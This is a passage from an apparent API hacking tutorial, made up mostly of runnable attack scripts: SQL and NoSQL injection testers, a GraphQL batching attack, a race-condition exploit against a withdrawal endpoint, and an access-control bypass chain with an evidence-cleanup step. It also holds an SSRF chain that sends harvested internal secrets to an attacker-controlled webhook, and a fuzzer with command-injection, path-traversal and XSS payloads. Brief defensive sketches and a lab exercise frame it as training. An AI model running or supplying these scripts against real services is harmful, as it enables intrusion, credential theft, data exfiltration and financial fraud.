if (/key|token|auth|api/i.test(key) ||
/^[a-zA-Z0-9_\-]{20,64}$/.test(value)) {
found.push({
key: value,
source: `sessionStorage.${key}`,
context: `${key}: ${value}`
});
}
}
return found;
}
// Run this in the browser console
console.table(findApiKeys());
Advanced Injection Techniques
1. Time-Based Blind Injection
When there's no direct output, time-based techniques can detect vulnerabilities:
# Python script for time-based SQL injection testing
import requests
import time
import statistics


def test_time_based_sqli(url, parameter, payloads, requests_per_payload=3, min_delay=1.0):
    results = []
    # Establish baseline response time
    baseline_times = []
    for _ in range(5):
        start_time = time.time()
        requests.get(url, timeout=10)
        end_time = time.time()
        baseline_times.append(end_time - start_time)
    baseline_avg = statistics.mean(baseline_times)
    baseline_stddev = statistics.stdev(baseline_times) if len(baseline_times) > 1 else 0
    print(f"Baseline response time: {baseline_avg:.4f}s (±{baseline_stddev:.4f}s)")
    # Test each payload
    for payload in payloads:
        payload_times = []
        # Make multiple requests to confirm result
        for _ in range(requests_per_payload):
            try:
                start_time = time.time()
                # Pass the payload via params so requests URL-encodes it
                requests.get(url, params={parameter: payload}, timeout=10)
                end_time = time.time()
                payload_times.append(end_time - start_time)
            except requests.exceptions.Timeout:
                print(f"Request timed out for payload: {payload}")
                payload_times.append(10)  # Assume timeout value
            except Exception as e:
                print(f"Error for payload {payload}: {e}")
        if not payload_times:
            # Every request failed, so there is nothing to average
            continue
        # Calculate stats
        avg_time = statistics.mean(payload_times)
        stddev = statistics.stdev(payload_times) if len(payload_times) > 1 else 0
        # Determine if there's a significant time difference. Requiring a
        # minimum absolute delay (min_delay) avoids flagging ordinary network
        # jitter when the baseline standard deviation is close to zero
        time_diff = avg_time - baseline_avg
        significant = time_diff > max(3 * baseline_stddev, min_delay)
        results.append({
            "payload": payload,
            "avg_time": avg_time,
            "stddev": stddev,
            "diff_from_baseline": time_diff,
            "significant": significant
        })
        status = "VULNERABLE" if significant else "Not vulnerable"
        print(f"{status}: {payload} - Avg: {avg_time:.4f}s (±{stddev:.4f}s), Diff: {time_diff:.4f}s")
    # Return results
    return results


# Example usage
url = "https://api.example.com/products"
parameter = "id"
payloads = [
    "1",  # Normal case
    "1' AND (SELECT SLEEP(2)) AND '1'='1",  # MySQL
    "1'; WAITFOR DELAY '0:0:2'--",  # SQL Server
    "1' AND 1=pg_sleep(2)--",  # PostgreSQL
    "1' AND 1=dbms_pipe.receive_message('RDS',2)--",  # Oracle
    "1' AND SLEEP(2)=0 AND '1'='1"  # MySQL alternative
]
results = test_time_based_sqli(url, parameter, payloads)
2. GraphQL Batching Attacks
// Node.js script to perform GraphQL batching attacks
const axios = require('axios');
const fs = require('fs');
async function graphqlBatchAttack(endpoint, query, variables, batchSize, outputFile) {
try {
// Create a batch of queries
const operations = [];
for (let i = 0; i < batchSize; i++) {
operations.push({
query: query,
variables: variables
});
}
console.log(`Sending batch of ${batchSize} GraphQL operations...`);
const startTime = Date.now();
const response = await axios.post(endpoint, operations, {
headers: {
'Content-Type': 'application/json'
}
});
const endTime = Date.now();
// Calculate response time
const responseTime = endTime - startTime;
// Log results
const result = {
success: true,
batchSize,
responseTime,
responseStatus: response.status,
responseSizeBytes: JSON.stringify(response.data).length,
timestamp: new Date().toISOString()
};
console.log(`Batch attack completed in ${responseTime}ms`);
console.log(`Response status: ${response.status}`);
console.log(`Response size: ${result.responseSizeBytes} bytes`);
// Write to output file
if (outputFile) {
let existingData = [];
try {
if (fs.existsSync(outputFile)) {
existingData = JSON.parse(fs.readFileSync(outputFile));
}
} catch (e) {
console.warn(`Could not read existing output file: ${e.message}`);
}
existingData.push(result);
fs.writeFileSync(outputFile, JSON.stringify(existingData, null, 2));
console.log(`Results saved to ${outputFile}`);
}
return result;
} catch (error) {
console.error('Error performing GraphQL batch attack:');
if (error.response) {
console.error(`Status: ${error.response.status}`);
console.error('Response data:', error.response.data);
} else {
console.error(error.message);
}
return {
success: false,
batchSize,
error: error.message,
errorResponse: error.response ? error.response.data : null,
timestamp: new Date().toISOString()
};
}
}
// Example usage
const endpoint = 'https://api.example.com/graphql';
const query = `
query GetUserDetails($id: ID!) {
user(id: $id) {
id
name
email
role
posts {
id
title
content
}
}
}
`;
const variables = { id: 1 };
// Test with increasing batch sizes
async function runBatchingSeries() {
const batchSizes = [1, 5, 10, 50, 100, 500, 1000];
const results = [];
for (const size of batchSizes) {
console.log(`\nTesting batch size: ${size}`);
const result = await graphqlBatchAttack(endpoint, query, variables, size, 'graphql_batching_results.json');
results.push(result);
// Add delay between tests
await new Promise(resolve => setTimeout(resolve, 2000));
}
return results;
}
runBatchingSeries().catch(console.error);
3. Advanced NoSQL Injection
// MongoDB Operator Injection Examples
// Original API request
// POST /api/login
// {"username": "admin", "password": "password123"}

// Testing for operator injection vulnerability
// 1. Basic NoSQL injection with $ne operator
const payload1 = {
  "username": "admin",
  "password": {"$ne": null}
};

// 2. Using $exists operator
const payload2 = {
  "username": "admin",
  "password": {"$exists": true}
};

// 3. Using $gt (greater than) operator for blind attack
const payload3 = {
  "username": "admin",
  "password": {"$gt": "a"}
};

// 4. Using $regex for password brute forcing
const payload4 = {
  "username": "admin",
  "password": {"$regex": "^p"}
};

// 5. Using $where operator for JavaScript injection
const payload5 = {
  "$where": "function() { return true; }"
};

// 6. Array query operator exploitation
const payload6 = {
  "username": {"$in": ["admin", "moderator", "user"]}
};

// 7. Using aggregation operators
const payload7 = {
  "$expr": {"$gt": [1, 0]}
};
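To make the `$regex` brute-forcing idea concrete, the sketch below recovers a value one character at a time. It is a simulation under stated assumptions: `login_oracle` is a hypothetical stand-in for a vulnerable login endpoint that passes the attacker's pattern to the database, and Python's `re` module stands in for MongoDB's regex engine. No real service is contacted.

```python
import re
import string

SECRET = "password123"  # stands in for the stored password on a test target


def login_oracle(pattern):
    """Simulate a login that evaluates {"password": {"$regex": pattern}}."""
    return re.search(pattern, SECRET) is not None


def extract_with_regex(oracle, alphabet=string.ascii_lowercase + string.digits, max_len=32):
    """Grow a known prefix one character at a time using anchored patterns."""
    recovered = ""
    for _ in range(max_len):
        for ch in alphabet:
            if oracle("^" + re.escape(recovered + ch)):
                recovered += ch
                break
        else:
            break  # no character extended the prefix, so the value is complete
    return recovered


print(extract_with_regex(login_oracle))
```

Each guess costs one request, so the work grows with the alphabet size times the value's length instead of with the number of possible passwords.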
Business Logic Vulnerabilities
Business logic flaws are among the most dangerous API vulnerabilities because every individual request looks valid, so signature-based scanners rarely catch them:
1. Chained API Request Exploitation
// Example: Exploiting a chain of API requests to bypass limits
async function exploitChain(baseUrl, authToken) {
  try {
    // Step 1: Create a temporary resource
    console.log("Step 1: Creating temporary resource...");
    const createResponse = await fetch(`${baseUrl}/api/items`, {
      method: 'POST',
      headers: {
        'Authorization': `Bearer ${authToken}`,
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        name: "Temporary Item",
        description: "This will be used for exploitation"
      })
    });
    if (!createResponse.ok) {
      throw new Error(`Failed to create resource: ${createResponse.status}`);
    }
    const item = await createResponse.json();
    console.log(`Created item with ID: ${item.id}`);

    // Step 2: Add the resource to a shared collection that might bypass access controls
    console.log("Step 2: Adding to shared collection...");
    const addResponse = await fetch(`${baseUrl}/api/collections/public`, {
      method: 'PUT',
      headers: {
        'Authorization': `Bearer ${authToken}`,
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        item_id: item.id
      })
    });
    if (!addResponse.ok) {
      throw new Error(`Failed to add to collection: ${addResponse.status}`);
    }
    console.log("Item successfully added to public collection");

    // Step 3: Exploit permissions in the shared context to access elevated functions
    console.log("Step 3: Exploiting shared context permissions...");
    const exploitResponse = await fetch(`${baseUrl}/api/collections/public/items/${item.id}/admin_action`, {
      method: 'POST',
      headers: {
        'Authorization': `Bearer ${authToken}`,
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        action: "generate_report",
        scope: "all_users"
      })
    });
    if (!exploitResponse.ok) {
      throw new Error(`Exploitation failed: ${exploitResponse.status}`);
    }
    const result = await exploitResponse.json();
    console.log("Exploitation successful!");
    console.log(result);

    // Step 4: Clean up evidence (optional)
    console.log("Step 4: Cleaning up...");
    await fetch(`${baseUrl}/api/items/${item.id}`, {
      method: 'DELETE',
      headers: {
        'Authorization': `Bearer ${authToken}`
      }
    });
    console.log("Cleanup complete");
    return result;
  } catch (error) {
    console.error("Error during exploitation chain:", error);
    throw error;
  }
}
2. Race Conditions in APIs
# Python script to exploit API race conditions
import concurrent.futures
import threading
import time

import requests


def exploit_race_condition(url, auth_token, payload, num_threads=20):
    """
    Attempt to exploit race conditions in an API endpoint
    by sending multiple concurrent requests
    """
    # Setup headers
    headers = {
        'Authorization': f'Bearer {auth_token}',
        'Content-Type': 'application/json'
    }
    # Track successful responses
    successful_responses = []
    response_lock = threading.Lock()
    # Barrier that holds every worker until all are ready, so the requests
    # leave at (nearly) the same moment instead of as the pool starts threads
    start_barrier = threading.Barrier(num_threads)

    # Function to be executed by each thread
    def make_request():
        try:
            start_barrier.wait(timeout=10)
            response = requests.post(url, json=payload, headers=headers, timeout=10)
            # Store response if successful
            if response.status_code == 200:
                with response_lock:
                    successful_responses.append(response.json())
            return {
                'status_code': response.status_code,
                'response': response.text
            }
        except Exception as e:
            return {'error': str(e)}

    # Prepare threads
    print(f"Launching {num_threads} concurrent requests...")
    start_time = time.time()
    # Use ThreadPoolExecutor for better management
    with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
        # Submit one task per worker; the barrier releases them together
        futures = [executor.submit(make_request) for _ in range(num_threads)]
        # Wait for all to complete
        concurrent.futures.wait(futures)
    end_time = time.time()

    # Analyze results
    results = [future.result() for future in futures]
    success_count = sum(1 for r in results if r.get('status_code') == 200)
    print(f"Race condition test completed in {end_time - start_time:.2f} seconds")
    print(f"Successful requests: {success_count}/{num_threads}")
    if len(successful_responses) > 1:
        print("Potential race condition detected!")
        print(f"Got {len(successful_responses)} successful responses")
    else:
        print("No race condition detected")
    return {
        'successful_responses': successful_responses,
        'all_results': results
    }


# Example usage
url = "https://api.example.com/withdraw"
auth_token = "valid_user_token"
payload = {
    "amount": 100,
    "account_id": "12345",
    "destination": "54321"
}
# Try to exploit a potential race condition in a withdrawal API
exploit_race_condition(url, auth_token, payload, num_threads=50)
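The bug this script hunts for is usually a check-then-act gap on the server. The sketch below reproduces that gap locally so it can be studied without a target. The `Account` class and the 10 ms delay are illustrative assumptions, not code from any real withdrawal service.

```python
import threading
import time


class Account:
    def __init__(self, balance):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw_unsafe(self, amount):
        # Check-then-act with a gap: the window a race condition exploits
        if self.balance >= amount:
            time.sleep(0.01)  # simulated processing delay, e.g. a database round trip
            self.balance -= amount
            return True
        return False

    def withdraw_safe(self, amount):
        # Holding a lock makes the check and the update a single atomic step
        with self._lock:
            if self.balance >= amount:
                time.sleep(0.01)
                self.balance -= amount
                return True
            return False


def run_concurrently(method, amount, workers=10):
    """Call method(amount) from several threads and count the approvals."""
    outcomes = []

    def worker():
        outcomes.append(method(amount))

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(outcomes)


unsafe = Account(100)
unsafe_approvals = run_concurrently(unsafe.withdraw_unsafe, 100)
print("unsafe approvals:", unsafe_approvals, "final balance:", unsafe.balance)

safe = Account(100)
safe_approvals = run_concurrently(safe.withdraw_safe, 100)
print("safe approvals:", safe_approvals, "final balance:", safe.balance)
```

The locked version approves exactly one withdrawal. The unlocked version typically approves several and drives the balance negative, which is the same signal the script above looks for when it counts more than one successful response.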
API Vulnerability Chaining
1. From SSRF to Data Exfiltration
# Python script demonstrating API vulnerability chaining
# Chain: SSRF → Internal API Access → Data Exfiltration
import base64
import json
from urllib.parse import urlparse

import requests


def chain_ssrf_to_exfiltration(target_url, webhook_url):
    """
    Chain multiple vulnerabilities:
    1. Use SSRF to access internal API
    2. Retrieve sensitive data
    3. Exfiltrate data to external server
    """
    print(f"Starting exploitation chain against {target_url}")

    # Step 1: Probe for SSRF vulnerability
    print("\n[Step 1] Testing for SSRF vulnerability...")
    # Try different SSRF payloads
    ssrf_payloads = [
        "http://localhost:8080/api/internal/users",
        "http://127.0.0.1:8080/api/internal/users",
        "http://0.0.0.0:8080/api/internal/users",
        "http://internal-api/users",
        "http://10.0.0.1/api/users"
    ]
    ssrf_response = None
    successful_payload = None
    for payload in ssrf_payloads:
        try:
            print(f"Trying SSRF payload: {payload}")
            # Assuming there's an endpoint that fetches external resources
            response = requests.post(
                f"{target_url}/api/fetch_resource",
                json={"url": payload},
                timeout=5
            )
            # Check if we got a successful response with data
            if response.status_code == 200 and "user" in response.text.lower():
                print(f"SSRF vulnerability confirmed with payload: {payload}")
                ssrf_response = response.json()
                successful_payload = payload
                break
        except Exception as e:
            print(f"Error with payload {payload}: {e}")
    if not ssrf_response:
        print("Failed to exploit SSRF vulnerability")
        return False

    # Step 2: Enumerate internal API using SSRF
    print("\n[Step 2] Enumerating internal API...")
    # Extract scheme and host from the successful payload. Parsing the URL also
    # handles payloads whose path does not contain '/api/'.
    parsed = urlparse(successful_payload)
    internal_base_url = f"{parsed.scheme}://{parsed.netloc}"
    # Potential internal endpoints to probe
    internal_endpoints = [
        "/api/internal/users",
        "/api/internal/config",
        "/api/internal/keys",
        "/api/internal/secrets",
        "/api/system/info",
        "/api/admin/users",
        "/api/v1/internal/database",
        "/health",
        "/metrics",
        "/actuator/env",
        "/actuator/health"
    ]
    internal_data = {}
    for endpoint in internal_endpoints:
        try:
            internal_url = f"{internal_base_url}{endpoint}"
            print(f"Probing internal endpoint: {internal_url}")
            response = requests.post(
                f"{target_url}/api/fetch_resource",
                json={"url": internal_url},
                timeout=5
            )
            # Store responses that look promising
            if response.status_code == 200:
                try:
                    data = response.json()
                    internal_data[endpoint] = data
                    print(f"Successfully accessed internal endpoint: {endpoint}")
                except ValueError:
                    print(f"Got response but not valid JSON from: {endpoint}")
        except Exception as e:
            print(f"Error accessing {endpoint}: {e}")
    if not internal_data:
        print("Failed to gather internal API data")
        return False

    # Step 3: Extract sensitive information
    print("\n[Step 3] Extracting sensitive information...")
    # Look for sensitive data patterns in the responses
    sensitive_data = {}
    patterns = [
        "api_key", "key", "secret", "password", "token", "credential",
        "admin", "user", "database", "connection", "config"
    ]

    def search_for_sensitive_data(data, path=""):
        if isinstance(data, dict):
            for key, value in data.items():
                new_path = f"{path}.{key}" if path else key
                # Check if the key matches sensitive patterns
                if any(pattern in key.lower() for pattern in patterns):
                    sensitive_data[new_path] = value
                search_for_sensitive_data(value, new_path)
        elif isinstance(data, list):
            for i, item in enumerate(data):
                new_path = f"{path}[{i}]"
                search_for_sensitive_data(item, new_path)

    # Process all gathered data
    for endpoint, data in internal_data.items():
        search_for_sensitive_data(data, endpoint)
    if not sensitive_data:
        print("No obviously sensitive data found")
    else:
        print(f"Found {len(sensitive_data)} potentially sensitive data items")

    # Step 4: Exfiltrate the data
    print("\n[Step 4] Exfiltrating data...")
    # Combine all gathered data
    exfil_data = {
        "ssrf_response": ssrf_response,
        "internal_api_data": internal_data,
        "sensitive_data": sensitive_data
    }
    # Encode the data to avoid potential issues
    encoded_data = base64.b64encode(json.dumps(exfil_data).encode()).decode()
    try:
        # Send data to attacker-controlled webhook
        exfil_response = requests.post(
            webhook_url,
            json={"data": encoded_data},
            timeout=10
        )
        if exfil_response.status_code == 200:
            print(f"Successfully exfiltrated data to {webhook_url}")
            return True
        else:
            print(f"Failed to exfiltrate data: {exfil_response.status_code}")
            return False
    except Exception as e:
        print(f"Error during data exfiltration: {e}")
        return False


# Example usage
target_url = "https://vulnerable-api.example.com"
webhook_url = "https://attacker-controlled-server.com/webhook"
chain_ssrf_to_exfiltration(target_url, webhook_url)
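When writing up an SSRF finding, it helps to state which payloads reached internal address space. The same check is the starting point for a server-side fix. The sketch below classifies a URL using only the standard library. `is_internal_target` is a hypothetical helper, and it deliberately does not resolve DNS, so hostnames such as `internal-api` need separate handling.

```python
import ipaddress
from urllib.parse import urlparse


def is_internal_target(url):
    """Return True if the URL's host is 'localhost' or a non-public IP literal."""
    host = urlparse(url).hostname
    if host is None:
        return False
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A hostname, not an IP literal: classifying it would require DNS resolution
        return False
    return ip.is_loopback or ip.is_private or ip.is_unspecified or ip.is_link_local


for candidate in [
    "http://localhost:8080/api/internal/users",
    "http://127.0.0.1:8080/api/internal/users",
    "http://10.0.0.1/api/users",
    "http://internal-api/users",
]:
    print(candidate, "->", is_internal_target(candidate))
```

A production filter would also resolve hostnames and re-check the resolved address at request time, since a name can point at an internal IP.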
Hands-On Challenge #3: Advanced API Attack Chain
Try This: In a controlled environment with vulnerable applications like DVWA, WebGoat, or Juice Shop:
- Identify and chain together at least three API vulnerabilities (e.g., authentication bypass → IDOR → data extraction)
- Document your methodology
- Implement a basic script to automate the attack chain
Expert Level: Custom Tooling and Zero-Days
At the expert level, we focus on developing custom tools, discovering new vulnerabilities, and building comprehensive testing frameworks.
Building an API Fuzzing Framework
# API Fuzzing Framework for Discovering Zero-Days
import argparse
import random
import string
import json
import time
import sys
import re
import requests
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor


class APIFuzzer:
    def __init__(self, base_url, auth_token=None, threads=10, delay=0.1, timeout=10, output_file=None, verbose=False):
        self.base_url = base_url.rstrip('/')
        self.auth_token = auth_token
        self.threads = threads
        self.delay = delay
        self.timeout = timeout
        self.output_file = output_file or f"api_fuzzing_results_{int(time.time())}.json"
        self.verbose = verbose
        self.session = requests.Session()
        self.results = []
        self.endpoints_discovered = set()
        self.parameters_discovered = {}
        self.vulnerabilities_found = []
        # Initialize headers
        self.headers = {}
        if auth_token:
            self.headers['Authorization'] = f"Bearer {auth_token}"
        # Payload libraries
        self.sqli_payloads = [
            "' OR 1=1--",
            "' UNION SELECT 1,2,3--",
            "' WAITFOR DELAY '0:0:1'--",
            "1; DROP TABLE users--",
            "' OR '1'='1",
            "1' ORDER BY 10--",
            "admin'--"
        ]
        self.nosqli_payloads = [
            '{"$gt": ""}',
            '{"$ne": null}',
            '{"$regex": "^admin"}',
            '{"$exists": true}',
            '{"$where": "this.password.length > 0"}',
            '{"$gt": 0}'
        ]
        self.xss_payloads = [
            "<script>alert(1)</script>",
            "<img src=x onerror=alert(1)>",
            "javascript:alert(1)",
            '"><script>alert(1)</script>',
            "';alert(1);//",
            "<svg onload=alert(1)>",
            "\"><img src=x onerror=alert(1)>"
        ]
        self.command_injection_payloads = [
            "; ls -la",
            "& whoami",
            "| cat /etc/passwd",
            "; sleep 5",
            "` ping -c 3 127.0.0.1 `",
            "$(cat /etc/passwd)",
            "'; ping -c 3 127.0.0.1 #"
        ]
        self.path_traversal_payloads = [
            "../../../etc/passwd",
            "..%2f..%2f..%2fetc%2fpasswd",
            "....//....//....//etc//passwd",
            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
            "..\\..\\..\\windows\\win.ini",
            "file:///etc/passwd",
            "/var/www/html/index.php"
        ]
        # HTTP methods to test
        self.http_methods = ["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS", "HEAD"]

    def log(self, message, level="INFO"):
        """Log messages if verbose mode is enabled"""
        if self.verbose or level == "ERROR" or level == "CRITICAL":
            timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            print(f"[{timestamp}] [{level}] {message}")

    def generate_random_string(self, length=10):
        """Generate a random string for testing"""
        return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))

    def generate_random_number(self, min_val=1, max_val=1000):
        """Generate a random number for testing"""
        return random.randint(min_val, max_val)

    def generate_random_json(self, fields=None):
        """Generate random JSON data"""
        if not fields:
            fields = ['name', 'id', 'description', 'value', 'enabled']
        data = {}
        for field in fields:
            # 50% chance of being a string, 30% number, 20% boolean
            rand_type = random.random()
            if rand_type < 0.5:
                data[field] = self.generate_random_string()
            elif rand_type < 0.8:
                data[field] = self.generate_random_number()
            else:
                data[field] = random.choice([True, False])
        return data

    def discover_endpoints(self, wordlist=None):
        """Discover API endpoints using a wordlist"""
        self.log("Starting endpoint discovery...")
        # Default mini wordlist if none provided
        if not wordlist:
            wordlist = [
                'users', 'admin', 'products', 'orders', 'items', 'customers',
                'login', 'logout', 'register', 'auth', 'token', 'api', 'v1', 'v2',
                'data', 'info', 'profile', 'settings', 'config', 'system', 'health',
                'status', 'metrics', 'stats', 'reports', 'dashboard', 'uploads',
                'files', 'images', 'documents', 'payments', 'billing', 'subscriptions',
                'comments', 'reviews', 'ratings', 'favorites', 'cart', 'checkout',
                'search', 'query', 'filter', 'sort', 'page', 'limit', 'internal'
            ]
        # Add common API path components
        api_prefixes = ['api', 'apis', 'api/v1', 'api/v2', 'api/v3', 'v1', 'v2', 'rest', 'graphql', 'service']
        # Generate extended paths
        paths_to_check = []
        # Add base wordlist items
        paths_to_check.extend(wordlist)
        # Add items with API prefixes
        for prefix in api_prefixes:
            for word in wordlist:
                paths_to_check.append(f"{prefix}/{word}")
        # Add common nested paths
        for word1 in wordlist[:20]:  # Limit to avoid too many combinations
            for word2 in wordlist[:20]:
                paths_to_check.append(f"{word1}/{word2}")
        # Add some common IDs to resources
        for word in wordlist[:10]:
            paths_to_check.append(f"{word}/1")
            paths_to_check.append(f"{word}/admin")
            paths_to_check.append(f"{word}/test")
        self.log(f"Generated {len(paths_to_check)} paths to check")
        # Use ThreadPoolExecutor to parallelize requests
        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            executor.map(self.check_endpoint, paths_to_check)
        self.log(f"Endpoint discovery complete. Found {len(self.endpoints_discovered)} endpoints")
        return self.endpoints_discovered

    def check_endpoint(self, path):
        """Check if an endpoint exists"""
        url = f"{self.base_url}/{path}"
        for method in ["GET", "POST", "HEAD"]:  # Limit to common methods for discovery
            try:
                # Make request with appropriate method
                if method == "GET" or method == "HEAD":
                    response = self.session.request(
                        method,
                        url,
                        headers=self.headers,
                        timeout=self.timeout
                    )
                else:
                    # For POST, send minimal JSON data
                    response = self.session.request(
                        method,
                        url,
                        headers={**self.headers, 'Content-Type': 'application/json'},
                        json={},
                        timeout=self.timeout
                    )
                # Treat any non-5xx response as evidence the endpoint exists (for example,
                # 400 means it exists but needs correct params). 404 is excluded; otherwise
                # every path in the wordlist would be reported as discovered.
                if response.status_code < 500 and response.status_code != 404:
                    self.endpoints_discovered.add(path)
                    self.log(f"Discovered endpoint: {method} {path} (Status: {response.status_code})")
                    # Try to determine parameters from response
                    self.analyze_response_for_parameters(path, response)
                # Small delay to be polite
                time.sleep(self.delay)
            except Exception as e:
                if self.verbose:
                    self.log(f"Error checking {method} {path}: {str(e)}", "ERROR")

    def analyze_response_for_parameters(self, path, response):
        """Analyze response to discover potential parameters"""
        # Check if response is JSON
        if 'application/json' in response.headers.get('Content-Type', ''):
            try:
                data = response.json()
            except ValueError:
                data = None
            # Extract potential parameters from response
            if isinstance(data, dict) and data:
                # Add discovered parameters to our dictionary
                self.parameters_discovered[path] = list(data.keys())
                return
            # Look for arrays of objects which may indicate resource structure
            if isinstance(data, list) and data and isinstance(data[0], dict):
                self.parameters_discovered[path] = list(data[0].keys())
                return
        # Not JSON or couldn't parse: check for error messages that might reveal parameters
        text = response.text
        if 'parameter' in text.lower() or 'field' in text.lower():
            # Simple regex to find parameter names in error messages
            param_matches = re.findall(r'parameter [\'"]([A-Za-z0-9_]+)[\'"]', text)
            param_matches += re.findall(r'field [\'"]([A-Za-z0-9_]+)[\'"]', text)
            if param_matches:
                self.parameters_discovered[path] = param_matches

    def fuzz_endpoint(self, path, methods=None, parameters=None):
        """Fuzz a specific endpoint with payloads"""
        if not methods:
            methods = self.http_methods
        if not parameters:
            # Use discovered parameters or some defaults
            parameters = self.parameters_discovered.get(path, ['id', 'name', 'user_id', 'query', 'search', 'filter', 'sort', 'page', 'limit'])
        self.log(f"Fuzzing endpoint: {path} with methods {methods} and parameters {parameters}")
        # Prepare payload categories with vulnerability types
        payload_categories = [
            {"name": "SQL Injection", "payloads": self.sqli_payloads},
            {"name": "NoSQL Injection", "payloads": self.nosqli_payloads},
            {"name": "XSS", "payloads": self.xss_payloads},
            {"name": "Command Injection", "payloads": self.command_injection_payloads},
            {"name": "Path Traversal", "payloads": self.path_traversal_payloads}
        ]
        # Test each method
        for method in methods:
            # For each parameter
            for param in parameters:
                # Test with random valid data first (baseline)
                baseline_response = self.test_parameter(path, method, param, self.generate_random_string())
                if not baseline_response:
                    continue
                # Now test with each payload category
                for category in payload_categories:
                    for payload in category["payloads"]:
                        vulnerability = self.test_parameter(
                            path,
                            method,
                            param,
                            payload,
                            vulnerability_type=category["name"],
                            baseline=baseline_response
                        )
                        # test_parameter returns a plain result dict when nothing was
                        # detected, so only report entries flagged with a vulnerability type
                        if vulnerability and vulnerability.get("vulnerability_type"):
                            self.log(f"Potential {category['name']} vulnerability found in {method} {path}, parameter {param}", "CRITICAL")
                            self.vulnerabilities_found.append(vulnerability)
                        # Small delay to be polite
                        time.sleep(self.delay)

    def test_parameter(self, path, method, param, value, vulnerability_type=None, baseline=None):
        """Test a specific parameter with a value"""
        url = f"{self.base_url}/{path}"
        try:
            # Prepare data based on the method
            if method in ["GET", "DELETE", "HEAD"]:
                kwargs = {"params": {param: value}}
            else:
                # For POST, PUT, PATCH
                kwargs = {"json": {param: value}}
            # Add headers
            kwargs["headers"] = self.headers.copy()
            if method in ["POST", "PUT", "PATCH"]:
                kwargs["headers"]["Content-Type"] = "application/json"
            # Send the request
            response = self.session.request(method, url, **kwargs, timeout=self.timeout)
            # Record the result
            result = {
                "path": path,
                "method": method,
                "parameter": param,
                "value": value,
                "status_code": response.status_code,
                "response_time": response.elapsed.total_seconds(),
                "response_length": len(response.text),
                "timestamp": datetime.now().isoformat()
            }
            # Determine if this might be a vulnerability
            vulnerability = None
            if vulnerability_type and baseline:
                # Look for indicators of vulnerability based on type
                if self.detect_vulnerability(vulnerability_type, response, baseline, value):
                    vulnerability = {
                        **result,
                        "vulnerability_type": vulnerability_type,
                        "confidence": "medium",  # Initial confidence level
                        "baseline_status": baseline.get("status_code"),
                        "baseline_length": baseline.get("response_length")
                    }
            # Add to results
            self.results.append(result)
            return vulnerability or result
        except Exception as e:
            self.log(f"Error testing {method} {path} parameter {param}: {str(e)}", "ERROR")
            return None

    def detect_vulnerability(self, vuln_type, response, baseline, payload):
        """Detect if a response indicates a potential vulnerability"""
        # Compare with baseline response
        baseline_status = baseline.get("status_code")
        baseline_length = baseline.get("response_length", 0)
        response_length = len(response.text)
        # Check for significant response differences
        status_changed = response.status_code != baseline_status
        length_diff = abs(response_length - baseline_length)
        length_percentage = (length_diff / baseline_length * 100) if baseline_length > 0 else 0
        # Look for specific vulnerability indicators.
        # String entries are searched for in the response body (case-insensitive);
        # boolean entries are conditions that have already been evaluated.
        indicators = {
            "SQL Injection": [
                # Error messages
                "sql syntax", "mysql error", "postgresql error", "sqlite error", "ora-", "sql server",
                # Data leakage
                "query failed", "syntax error", "unclosed quotation mark", "unterminated string",
                # Successful exploitation signs (data differences)
                # Status code differences
                length_percentage > 30 and status_changed
            ],
            "NoSQL Injection": [
                # Error messages
                "mongodb", "bson", "mongo", "mongoose",
                # Data leakage
                "database error", "cursor", "$where", "$ne",
                # Status or data differences
                length_percentage > 25 or status_changed
            ],
            "XSS": [
                # Response reflecting the payload
                payload in response.text,
                # Minimal encoding
                payload.replace("<", "&lt;").replace(">", "&gt;") in response.text,
                # Script execution indicators
                "<script>" in response.text and payload in response.text
            ],
            "Command Injection": [
                # Output of commands in response
                "root:" in response.text and "/bin/" in response.text,  # passwd file
                "Directory of" in response.text and "Volume" in response.text,  # Windows dir
                "uid=" in response.text and "gid=" in response.text,  # output of `id`
                # Timing indicators
                response.elapsed.total_seconds() > baseline.get("response_time", 0) + 1 and "sleep" in payload
            ],
            "Path Traversal": [
                # File contents in response
                "root:" in response.text and ":/bin/" in response.text,  # passwd file
                "[boot loader]" in response.text,  # boot.ini
                "for 16-bit app support" in response.text.lower(),  # win.ini
                "# php configuration" in response.text.lower(),  # php.ini
                # Directory listing
                "<dir>" in response.text.lower() and "directory" in response.text.lower(),
                # Status or length changes indicating success
                (status_changed and length_percentage > 50) or (response.status_code == 200 and baseline_status != 200)
            ]
        }
        # Check for indicators specific to this vulnerability type
        vuln_indicators = indicators.get(vuln_type, [])
        for indicator in vuln_indicators:
            if isinstance(indicator, bool) and indicator:
                return True
            elif isinstance(indicator, str) and indicator.lower() in response.text.lower():
                return True
        return False

    def run_full_scan(self, wordlist=None):
        """Run a complete scan process"""
        self.log("Starting API security scan")
        # 1. Discover endpoints (falls back to the built-in wordlist when none is given)
        self.discover_endpoints(wordlist)
        # 2. Fuzz discovered endpoints
        for endpoint in self.endpoints_discovered:
            self.fuzz_endpoint(endpoint)
        # 3. Save results
        self.save_results()
        # 4. Print summary
        self.print_summary()

    def save_results(self):
        """Save scan results to a file"""
        output = {
            "scan_info": {
                "base_url": self.base_url,
                "timestamp": datetime.now().isoformat(),
                "endpoints_discovered": list(self.endpoints_discovered),
                "parameters_discovered": self.parameters_discovered,
                "vulnerabilities_found": self.vulnerabilities_found,
                "total_requests": len(self.results)
            },
            "detailed_results": self.results
        }
        with open(self.output_file, 'w') as f:
            json.dump(output, f, indent=2)
        self.log(f"Results saved to {self.output_file}")

    def print_summary(self):
        """Print a summary of findings"""
        print("\n" + "="*60)
        print(f"API SECURITY SCAN SUMMARY FOR {self.base_url}")
        print("="*60)
        print(f"\nEndpoints Discovered: {len(self.endpoints_discovered)}")
        for endpoint in sorted(self.endpoints_discovered):
            print(f"  - {endpoint}")
        print(f"\nPotential Vulnerabilities: {len(self.vulnerabilities_found)}")
        vuln_types = {}
